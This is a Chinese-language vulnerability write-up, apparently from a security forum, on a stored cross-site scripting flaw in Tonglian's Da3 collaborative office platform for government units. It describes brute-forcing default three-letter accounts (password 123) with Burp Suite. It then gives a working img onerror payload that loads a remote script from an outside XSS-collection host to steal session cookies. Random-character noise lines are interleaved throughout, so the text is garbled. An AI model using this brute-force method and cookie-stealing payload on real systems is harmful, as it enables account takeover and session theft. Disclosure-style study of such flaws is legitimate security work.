' B! s- J6 n. ?8 x; D) h
# q# g( ] p5 V6 a: u 同联Da3协同办公平台后台通用储存型xss漏洞2 \& C: k9 m8 \! z( |, S
1 _& R$ D& {! ?3 B" l, e
& ?( f2 ~ c4 Z! h- a- I 平台简介:
$ T' U+ x0 H' F/ }( W
1 _" b. b. z! u; U( ?" Z
* c/ k' c% b7 x% d5 K & N) ^0 M5 z5 v3 ^( l( F$ F2 }
5 [" P! x8 d9 l+ V; | ^
- F# \0 `# y1 q: S4 \ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. c1 `/ a( I8 J; x4 s
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
5 J, |# f# U. c) ^9 F3 H, n: u同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!' W0 ~, w8 F1 E- _! H7 v
d7 c' `. O, T0 c- U1 m, k* z $ w4 J( E0 ~5 C( ?# [* E
$ I% D$ f, E" F4 c
/ @# T0 A" R) t& \2 P6 g4 l0 c, A
# F3 U$ x3 F" `. ? q
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 V7 F& N$ q6 H# Y) X+ m. Z
- z% |7 }; v4 G# ~ p
7 l3 ^! r( E6 _% w
. K- M3 Q6 P. U1 h9 T! D( H; G
+ o. n7 U4 Y. f1 \
6 U' V, k8 @+ R4 z3 r& Z. S
http://1.1.1.1:7197/cap-aco/#(案例2-)
! E* h3 n( f" s! ?: Z
) ]- ]# u7 b: g4 r5 `0 o7 y & [# k2 O9 L* p# k$ [
http://www.XXOO.com (案例1-官网网站)" g; N( Q% f) Z5 J) r3 [2 t9 o
/ u L2 S( ?' K o9 f- I
+ I/ Y5 ~- K% s1 ?" O# N4 Z 漏洞详情:
( P/ Z U" T' U* t; `0 b* R, f, v
7 u& e( s7 Y' \! y3 f6 R
( z4 N# I* B( I& l 案例一、& r, j% H3 O4 [5 P7 O( f! k
6 G7 f2 @3 x4 C6 g; l
: Q3 B' J E- A
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试6 g7 d f4 f2 {8 M: v6 ^7 ^
% s/ P/ m2 ]0 T ( g# O5 A$ F) `, V. C
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
+ }3 }/ S3 {* L1 x* q* f
) V1 |' q9 ?$ X+ J! @
/ A. a- q( q. l$ q/ a 7 X+ _7 v2 b u
+ {3 U I ]8 H* u5 d9 a
+ B q7 Y3 E4 E
- @% @2 `8 m a( H" ^: U% i! M
: Q6 L# X! h/ M) U' t2 I ) c# y. |$ W$ S+ A3 S
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 q, F; m1 a" Y6 S! b) }. S6 J0 R
1 P1 p" e1 M4 T& }1 `% ~ % N5 V @+ p; n; _: X
8 ^0 L: m& }; E" e c* d
( ~% g( l+ j; D1 j
4 }2 ?0 B- v7 A% K! l( }1 |2 Y! b
' p& I, S3 c( E Z+ N# L' F
+ v$ C+ t1 e7 L- y# Z5 r
2 N! x8 S7 z2 H 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
; ]5 J' g; G/ `+ C, C
: ~2 z4 S7 n" l ( o* X8 k; L" A& I1 f
, `6 B9 }) h: w+ V
, M" N' x3 ?9 H9 d2 x% V- n2 F 8 j0 m, U1 p" J: r- S% Q( T
<img src=x2 N' B, W5 D6 q* J# L K7 p. D/ J
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
/ P1 j1 d$ a4 ^9 |
% ^$ V, |8 b9 H4 m, r# ?; K% e
: n6 W, R# l9 P6 A8 h; a
+ g: j# T& [4 F8 {: a
( x. Q) d8 `/ F8 n* g
' F# s. q* _$ Y0 u0 p' }
然后发送,接收cookie如图:
2 {# h9 |! B/ [1 b; J$ x" s8 n
& E9 Q6 k' R, Q t1 d
1 B, z' C' n5 w# H: C8 G7 g $ ]) f, N! `8 d- X' r! Q
# P7 g% X# w% w5 x
1 e6 y/ R; f+ G2 ?8 u& s, ~
( Q8 a$ Z+ T- b( a3 a! T- r
" I% o: v$ |& l3 b/ n g4 H 4 q7 l0 c) I4 F
! @; C3 l) h$ [ X
/ _! Z- f+ ~$ D: ?
" X' N: ?& C: v6 r N ' n7 J( V9 F |
# T9 k# }! s( i$ u3 n2 {$ g; C
! _* p. V9 S' `* n; [" [! X/ F
- D1 `1 C9 f) z B7 M+ K
/ \/ c- {6 S! s5 U0 n( i+ R
; J+ I& g/ G# A( p: t+ o( i6 M
0 K% s4 x! ^" J4 r
" T+ n0 S. r0 w$ Z# ] $ b$ A! l& B% O% `9 C- v1 ?
+ s4 C4 x8 i" c+ C* t+ [8 M
6 o+ h, }" r7 U& L
; H+ c1 G6 U; n; l0 V
案例2、 " D. o6 t) k( { F
) @ f8 V3 P: U( k4 ` 0 ^+ B, r2 N, L1 U/ n) m: E: {
前面步骤都一样,下面看效果图:
, l# E) }0 \4 {
, v) ^. T! T' W9 E
$ `0 N, i. Z+ m: d
' F7 ]* C6 Y5 ~, @
% z Y, G4 Y; F c: `
5 @5 |7 g4 m* H* t/ G
3 C, K/ f8 D4 E
/ B7 i4 `5 Q& n* S
, \9 l) i) u& `: c+ `8 \- n: D; [
: e# w; q+ W0 }6 g
" q* m1 z) L2 Z: h9 T- u% ^
0 ^& Y$ Z! w# a& r' J9 I+ R
6 k' i2 w( K4 d
! U& y/ E# h$ |- o. u2 @
7 n8 Q2 \( j6 F
2 y1 S( z- Z y% e7 w
0 R& h4 p1 g( d
3 X% m$ A# v+ Y1 a
; K5 K0 k# l8 S) u1 d$ W
4 u z( X$ l5 L3 M& L; Y
h+ X8 F3 C3 r7 N! B
# a" E6 g# p a e W$ U
8 u$ S( ?0 j7 }9 t. G
B0 b0 P% n Z+ f3 r" C/ b; Z 4 {3 ?* y+ i1 @% t3 n6 @/ G
, g/ T2 [& _5 k& K 2 b- b1 n U9 b4 S* j% t
- b+ F* z0 z/ I/ E9 ~7 J- ]
+ q+ A3 `/ E9 w" p. g